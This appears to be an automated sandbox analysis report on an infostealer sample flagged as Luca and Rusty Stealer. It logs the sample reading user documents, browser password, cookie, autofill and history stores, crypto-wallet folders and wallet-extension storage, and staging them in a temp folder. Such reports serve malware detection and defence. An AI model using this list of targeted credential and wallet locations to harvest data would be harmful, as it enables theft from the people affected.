              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\QCOILOQIKC.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\QCOILOQIKC.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\desktop.ini VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\DUUDTUBZFW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\DUUDTUBZFW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\DUUDTUBZFW.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\DUUDTUBZFW.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\EFOYFBOLXA.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\EFOYFBOLXA.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\EWZCVGNOWT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\EWZCVGNOWT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\GLTYDMDUST.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\GLTYDMDUST.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\GRXZDKKVDB.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\GRXZDKKVDB.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\GRXZDKKVDB.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\HMPPSXQPQV.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\KLIZUSIQEN.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\KLIZUSIQEN.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\KLIZUSIQEN.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\NVWZAPQSQL.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\NVWZAPQSQL.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\NWCXBPIUYI.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\NYMMPCEIMA.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\QCOILOQIKC.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\Documents\QCOILOQIKC.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Autofill VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Cookies VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\CreditCards VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Downloads VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Passwords VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\screen1.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\sensitive-files.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\sensitive-files.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\user_info.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Passwords\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\History\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\History\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\History\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\History\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Downloads\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Autofill\Edge_Default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\Autofill\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Luca Stealer
              Source: Yara matchFile source: cOQD62FceM.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.cOQD62FceM.exe.7ff747670000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cOQD62FceM.exe PID: 6176, type: MEMORYSTR
              Yara detected Rusty Stealer
              Source: Yara matchFile source: Process Memory Space: cOQD62FceM.exe PID: 6176, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\B
              Source: cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\B
              Source: cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\
              Source: cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore\s4
              Source: cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\
              Source: cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore\s4
              Source: cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\RC_
              Source: cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\
              Source: cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore\s4
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliobJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdbJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmidedJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioamekaJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmgJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login DataJump to behavior
